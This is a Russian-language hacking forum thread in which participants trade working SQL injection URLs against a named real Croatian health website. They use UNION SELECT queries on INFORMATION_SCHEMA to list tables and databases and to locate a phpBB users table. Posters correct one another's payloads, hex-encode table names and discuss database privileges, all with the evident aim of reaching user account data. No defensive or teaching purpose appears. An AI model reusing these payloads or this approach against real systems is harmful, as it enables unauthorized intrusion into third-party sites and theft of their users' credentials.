_http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES/* есть такой скуль. там выводит таблицу phpbb, и так я знаю впринципе что он там есть, но приобращении. http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,2,3+from+phpbb/* или же _http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+phpbb/* выдает ошибку
Code: http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/* гугл, антибоян
Code: http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+16,1/* ТС, вообщето: Code: http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,имя_столбца,5,6,7,8,9,10,11+from+имя_таблицы/* А не просто имя_таблицы
Code: http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/* --> phpbb_users Code: http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/* --> beracivi Однако, Code: http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+beracivi.phpbb_users/* Не катит...
Code: http://www.zdravlje.hr/clanak.php?id=-12909+union+select+concat(table_schema,char(46),table_name),2,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+where+table_name=0x70687062625f7573657273+limit+22,1/* Там 22 Базы Данных содержат таблицу phpbb_users и далеко не факт что БД, используемая этим сайтом содержит эту таблицу. На просмотр БД других сайтов у этого пользователя прав не хватает.
